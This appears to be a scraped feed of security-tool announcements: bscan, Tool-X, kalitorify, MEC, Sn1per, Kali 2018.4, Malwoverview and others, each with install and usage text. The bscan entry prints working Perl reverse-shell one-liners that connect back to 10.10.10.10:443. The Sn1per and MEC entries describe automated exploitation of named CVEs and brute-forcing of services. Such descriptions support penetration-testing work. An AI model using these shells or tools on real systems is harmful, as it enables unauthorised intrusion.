Bscan – An Asynchronous Target Enumeration Tool

Synopsisbscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.Installationbscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.Download the latest packaged version from PyPI:pip install bscanOr get the bleeding-edge version from version control:pip install https://github.com/welchbj/bscan/archive/master.tar.gzBasic Usagebscan has a wide variety of configuration options which can be used to tune scans to your needs. Here’s a quick example:$ bscan \> –max-concurrency 3 \> –patterns [Mm]icrosoft \> –status-interval 10 \> –verbose-status \> scanme.nmap.orgWhat’s going on here?–max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time–patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output–status-interval 10 tells bscan to print runtime status updates every 10 seconds–verbose-status means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org is the host upon which we want to enumeratebscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt specifies the installed programs that bscan plans on usingport-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml defines the scans be run on the target(s) on a per-service basisDetailed OptionsHere’s what you should see when running bscan –help:usage: bscan [OPTIONS] targets _| |__ ___ ___ __ _ _ __| ‘_ \/ __|/ __/ _` | ‘_ \| |_) \__ \ (__ (_| | | | ||_.__/|___/\___\__,_|_| |_|an asynchronous service enumeration toolpositional arguments: targets the targets and/or networks on which to perform enumerationoptional arguments: -h, –help show this help message and exit –brute-pass-list F filename of password list to use for brute-forcing –brute-user-list F filename of user list to use for brute-forcing –cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) –config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program –hard force overwrite of existing directories –max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) –no-program-check disable checking the presence of required system programs –no-file-check disable checking the presence of files such as configured wordlists –no-service-scans disable running scans on discovered services –output-dir D the base directory in which to write output files –patterns [ [ …]] regex patterns to highlight in output text –ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans –quick-only whether to only run the quick scan (and not include the thorough scan over all ports) –qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan –status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) –ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan –udp whether to run UDP scans –udp-method S the method for performing the UDP port scan; must correspond to a configured port scan –verbose-status whether to print verbose runtime status updates, based on frequency specified by `–status-interval` flag –version program version –web-word-list F the wordlist to use for scansCompanion ToolsThe main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here’s a simple example:$ bscan-wordlists –find “*win*"/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt/usr/share/wordlists/metasploit/sensitive_files_win.txt/usr/share/seclists/Passwords/common-passwords-win.txtTry bscan-wordlists –help to explore other options.bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here’s a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:$ bscan-shells –port 443 10.10.10.10 | grep -i -A1 perlperl for windowsperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’perl with /bin/shperl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl without /bin/shperl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells –help to explore other options.DevelopmentStart by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):# setup the environmentmkvirtualenv -p $(which python3) bscan-devworkon bscan-dev# get the depspip install -r dev-requirements.txtLint and type-check the project (these are run on Travis, too):flake8 . && mypy bscanWhen it’s time to package a new release:# build source and wheel distributionspython setup.py bdist_wheel sdist# run post-build checkstwine check dist/*# upload to PyPItwine upload dist/*Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Tool-X – A Kali Linux Hacking Tool Installer

What is Tool-X ?Tool-X is a kali linux hacking Tool installer. Tool-X is Developed By Rajkumar Dusad. with the help of Tool-X you can install best hacking tools in Rooted or Non Rooted Android devices. In the Tool-X there are almost 240 hacking tools available for termux app and GNURoot Debian terminal. you can install any tool by single click. Tool-X is Specially made for Termux and GNURoot Debian Terminal. Now Tool-X is available for Ubuntu.How to use ?Type 0 : To install all tools.Type 1 : to sow all available tools and type the number of a tool which you want to install.Type 2 : to show tools category.Type 3 : for install operating system in termuxType 4 : if you want to update Tool-X.Type 5 : if you know About us.Type x : for exit.Tool-X is available forAndroidUbuntuHow to Install in termux ?Open the termux app and type following commands. apt update pkg install git git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex if not work than type ./install.aex Now Tool-X is installed successfully. To run Tool-X Type Tool-XNow type Tool-X from anywhare in your terminal to open Tool-X.How to Install in GNURoot Debian Terminal ?Open the GNURoot Debian app and type following commands. apt update apt install git cd && git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sh install.aex if not work than type ./install.aex Now Tool-X is installed successfully. To run Tool-X Type Tool-XNow type Tool-X from anywhare in your terminal to open Tool-X. But use this tool only for legal purpose.How to install in Ubuntu ? sudo apt-get Update sudo apt-get install git sudo git clone https://github.com/Rajkumrdusad/Tool-X.git cd Tool-X chmod +x install.aex sudo sh install.aex OR ./install.aex Now Tool-X is installed successfully. To run Tool-X Type Tool-XNow type Tool-X from anywhare in your terminal to open Tool-X. But use this tool only for legal purpose.Download Tool-X

Link: http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html

Kalitorify – Transparent Proxy Through Tor For Kali Linux OS

kalitorify is a shell script for Kali Linux which use iptables settings for transparent proxy through Tor, the program also allows you to perform various checks like checking the external ip, or if Tor has been configured correctly.What is Transparent Proxy?Also known as an intercepting proxy, inline proxy, or forced proxy, a transparent proxy intercepts normal communication at the network layer without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of a gateway or router.Strictly speaking, with kalitorify you can redirect all traffic of your Kali Linux operating system through Tor.In the Tor project wiki you find an explanation of what is the “transparent proxy through tor" and related settings.Recommendationskalitorify is produced independently from the Tor anonimity software and carries no guarantee from the Tor Project about quality, suitability or anything else, please read these documents to know how to use the Tor network safely:Tor General FAQWhonix Do Not recommendationsInstallInstall dependencies:sudo apt update && sudo apt full-upgrade -ysudo apt install tor -yInstall kalitorify and reboot:git clone https://github.com/brainfucksec/kalitorifycd kalitorify/sudo make installsudo rebootUsagekalitorify [option]Options-t, –torstart transparent proxy through tor-c, –clearnetreset iptables and return to clearnet navigation-s, –statuscheck status of program and services-i, –ipinfoshow public IP-r, –restartrestart tor service and change IPDownload Kalitorify

Link: http://feedproxy.google.com/~r/PentestTools/~3/iaWI5yDUmTg/kalitorify-transparent-proxy-through.html

Defend against Brute Force Attack with Fail2ban

Daily we hear some news related to cybercrime just, like, some malicious users or bots has successfully defaced some publicly accessible website or some services. As we always try to explain through our articles, how such types of activities are possible when system is weak configured or misconfigured. Therefore, it is important to build some… Continue reading →
The post Defend against Brute Force Attack with Fail2ban appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/defend-against-brute-force-attack-with-fail2ban/

Deep Explorer – Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained

Dependencies pip3 install -r requirements.txtalso you should have Tor installedUsagepython3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWLExamples:python3 deepexplorer.py “legal thing" 40 default legal (will crawl if results obtained in browser do not reach 40, also the script will show links which have "legal" string in html [like intext dork in google])python3 deepexplorer.py "ilegal thing" 30 all dni(will crawl every link obtained in browser [ultil reachs 30], also the script will show links which have "dni" string in html [like intext dork in google])python3 deepexplorer.py "legal thing" 30 none (do not crawl, only obtain links from browser)AboutDeep Explorer is a tool designed to search (any) thing in a few secondsAny idea, failure etc please report to telegram: blueudpresults.txt contains results obtaioned in previus searchTested in ParrotOS and Kali Linux 2.0Type of ErrorsError importing… -> You should try manual pip install packageError connecting to server -> Cant connect to ahmia browser If deep explorer can not execute service …, do it manually, deep explorer checks the tor instance at the beginning so it will skip that partContactName: Eduardo Pérez-MalumbresTelegram: @blueudpTwitter: https://twitter.com/blueudpDownload Deep-Explorer

Link: http://feedproxy.google.com/~r/PentestTools/~3/Uky3GEJ7r8k/deep-explorer-tool-which-purpose-is.html

MEC v1.4.0 – Mass Exploit Console

massExploitConsolea collection of hacking tools with a cli ui.Disclaimerplease use this tool only on authorized systems, im not responsible for any damage caused by users who ignore my warningexploits are adapted from other sources, please refer to their author infoplease note, due to my limited programming experience (it’s my first Python project), you can expect some silly bugsFeaturesan easy-to-use cli uiexecute any adpated exploits with process-level concurrencysome built-in exploits (automated)hide your ip addr using proxychains4 and ss-proxy (built-in)zoomeye host scan (10 threads)a simple baidu crawler (multi-threaded)censys host scanGetting startedgit clone https://github.com/jm33-m0/massExpConsole.git && cd massExpConsole && ./install.pywhen installing pypi deps, apt-get install libncurses5-dev (for Debian-based distros) might be needednow you should be good to go (if not, please report missing deps here)type proxy command to run a pre-configured Shadowsocks socks5 proxy in the background, vim ./data/ss.json to edit proxy config. and, ss-proxy exits with mec.pyRequirementsGNU/Linux, WSL, MacOS (not tested), fully tested under Arch Linux, Kali Linux (Rolling, 2018), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)Python 3.5 or later (or something might go wrong, https://github.com/jm33-m0/massExpConsole/issues/7#issuecomment-305962655)proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven’t installed it yetnote that you have to install all the deps of your exploits or tools as wellUsagejust run mec.py, if it complains about missing modules, install themif you want to add your own exploit script (or binary file, whatever):cd exploits, mkdir your exploit should take the last argument passed to it as its target, dig into mec.py to know morechmod +x <exploit> to make sure it can be executed by current useruse attack command then m to select your custom exploittype help in the console to see all available featureszoomeye requires a valid user account config file zoomeye.conf Download MEC

Link: http://www.kitploit.com/2018/12/mec-v140-mass-exploit-console.html

Sn1per v6.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/RLWB_3_Wk9M/sn1per-v60-automated-pentest-framework.html

Kali Linux 2018.4 Release – Penetration Testing and Ethical Hacking Linux Distribution

Welcome to our fourth and final release of 2018, Kali Linux 2018.4, which is available for immediate download. This release brings kernel up to version 4.18.10, fixes numerous bugs, includes many updated packages, and a very experimental 64-bit Raspberry Pi 3 image.New Tools and Tool UpgradesWireguard is a powerful and easy to configure VPN solution that eliminates many of the headaches one typically encounters setting up VPNs. Check out Wireguard post for more details on this great addition.Kali Linux 2018.4 also includes updated packages for Burp Suite, Patator, Gobuster, Binwalk, Faraday, Fern-Wifi-Cracker, RSMangler, theHarvester, wpscan, and more. For the complete list of updates, fixes, and additions, please refer to the Kali Bug Tracker Changelog.64-bit Raspberry Pi 3Has been created a very experimental Raspberry Pi 3 image that supports 64-bit mode. Please note that this is a beta image, so if you discover anything that isn’t working, please alert on the bug tracker.Ensuring your Installation is UpdatedTo double check your version, first make sure your Kali package repositories are correct.root@kali:~# cat /etc/apt/sources.listdeb http://http.kali.org/kali kali-rolling main non-free contribThen after running ‘apt -y full-upgrade’, you may require a ‘reboot’ before checking:root@kali:~# grep VERSION /etc/os-releaseVERSION=”2018.4"VERSION_ID="2018.4"root@kali:~#root@kali:~# uname -aLinux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/LinuxIf you come across any bugs in Kali, please open a report on our bug tracker. We’ll never be able to fix what we don’t know about. Download Kali Linux 2018.4If you would like to check out this latest and greatest Kali release, you can find download links for ISOs and Torrents on the Kali Downloads page along with links to the Offensive Security virtual machine and ARM images, which have also been updated to 2018.4. If you already have a Kali installation you’re happy with, you can easily upgrade in place as follows.root@kali:~# apt update && apt -y full-upgradeDownload Kali Linux 2018.4

Link: http://feedproxy.google.com/~r/PentestTools/~3/L9M1Xv19iKQ/kali-linux-20184-release-penetration.html

imR0T – Send A Message To Your Whatsapp Contact And Protect Your Text By Encrypting And Decrypting (ROT13)

imR0T: Send a quick message with simple text encryption to your whatsapp contact and protect your text by encrypting and decrypting, basically in ROT13 with new multi encryption based algorithm on ASCII and Symbols Substitution.How To UseIt’s simple:# Clone this repositorygit clone https://github.com/Screetsec/imR0T.git# Go into the repositorycd imR0T# Permission Acceschmod +x imR0T# Run the app./imR0TCommand Linehelp: A standard command displaying help.imR0T╺─╸[ cli ] > help | |_ Options:[arguments] help |:| show this message show |:| show all modules from this tools list style |:| show list style use |:| use a module, ex : use [ID] options |:| show module options run |:| Execute the module set |:| Set a value back |:| Back to main clear |:| Clear window ls |:| list directory content cat |:| read file/standard input pwd |:| print name of current/working director exit |:| Exit programConfigurationBefore using feature send message to your whatsapp contact with text encryption. you must config file inconf/whatsapp.confand add your api key# Getting API :# Register in here https://www.apiwha.com/# Use your mail or temp mail 😛 # Setup API KEY# Example : # – api=”CA6DSQ3CLPC6FCQ3CLPC6F"api=""Demo VideoDownload imR0T

Link: http://feedproxy.google.com/~r/PentestTools/~3/xr9d3A7N8RI/imr0t-send-message-to-your-whatsapp.html

Malwoverview – Tool To Perform An Initial And Quick Triage On Either A Directory Containing Malware Samples Or A Specific Malware Sample

Malwoverview.py is a simple tool to perform an initial and quick triage on a directory containing malware samples (not zipped).This tool aims to :Determining similar executable malware samples (PE/PE+) according to the import table (imphash) and group them by different colors (pay attention to the second column from output). Thus, colors matter! Determining whether executable malware samples are packed or not packed according to the following rules: 2a. Two or more sections with Entropy > 7.0 or < 1.0 ==> Packed. 2b. One one section with Entropy > 7.0 or two sections with SizeOfRawData ==> Likely packed. 2c. None section with Entropy > 7.0 or SizeOfRawData ==> not packed.Determining whether the malware samples contain overlay. Determining the .text section entropy. Malwoverview.py only examines PE/PE+ files, skipping everything else. Checking each malware sample against Virus Total.REQUERIMENTSThis tool was tested on a Kali Linux 2018 system. Therefore, it will be necessary to install:Python version 2.7.x. $ apt-get install pythonPython-magic.To install python-magic package you can execute the following command: $ pip install python-magicOr compiling it from the github repository: $ git clone https://github.com/ahupp/python-magic$ cd python-magic/$ python setup.py build$ python setup.py installAs there are serious problems about existing two versions of python-magic package, my recommendation is to install it from github (second procedure above) and copy the magic.py file to the SAME directory of malwoverview tool. Pefile and colorama packages: $ pip install pefile$ pip install colorama$ pip install simple-json$ pip install requestsUSAGETo use the malwoverview, execute the command as shown below: $ python malwoverview -d <directory> -f <fullpath> -i <0|1> -b <0|1> -v <0|1> -a <0|1> -p <0|1> -s <0|1> -x <0|1>where: <directory> -d is the folder containing malware samples. <fullpath> -f specifies the full path to a file. Shows general information about the file (any filetype). (optional) -b 1 forces light gray background (for black terminals). It does not work with -f option. (optional) -i 1 show imports and exports (it is used with -f option). (optional) -x 1 extracts overlay (it is used with -f option). (optional) -v 1 queries Virus Total database for positives and totals (any filetype). (optional) -a 1 (optional) query Hybrid Analysis database for general report.Thus, you need to edit the malwoverview.py and insert your HA API and respective secret. (optional) -s 1 shows antivirus reports from the main players. This option is used with -f option (any filetype). (optional) -p 1 use this option if you have a public Virus Total API. It forces a one minute wait every 4 malware samples, but allows obtaining a complete evaluation of the malware repository.. If you use Virus Total option, so it is necessary to edit the malwoverview.py and insert your VT API. Remember that public VT API only allows 4 searches per second (as shown at the image above). Therefore, if you are willing to wait some minutes, so you can use the -p option, which forces a one minute wait every 4 malware samples, but allows obtaining a complete evaluation of the repository. *ATENTION: if the directory contains many malware samples, so malwoverview.py could take some time. :)HISTORYVersion 1.4: This version: * Adds the -a option for getting the Hybrid Analysis summary report. * Adds the -i option for listing imported and exported functions. Therefore, imported/exported function report was decoupled for a separated option. Version 1.3: This version: * Adds the -p option for public Virus Total API.Version 1.2: This version includes: * evaluates a single file (any filetype) * shows PE sessions. * shows imported functions. * shows exported function. * extracts overlay. * shows AV report from the main players. (any filetype)Version 1.1: This version: * Adds the VT checking feature.Version 1.0: Malwoverview is a tool to perform a first triage of malware samples in a directory and group them according to their import functions (imphash) using colors. This version: * Shows the imphash information classified by color. * Checks whether malware samples are packed. * Checks whether malware samples have overlay. * Shows the entropy of the malware samples. ScreenshotsImportant aspect: Malwoverview does NOT submit samples to VT. It submits only hashes, so respecting Non-Disclosure Agreements (NDAs).Download Malwoverview

Link: http://feedproxy.google.com/~r/PentestTools/~3/zvjsmu5dk5M/malwoverview-tool-to-perform-initial.html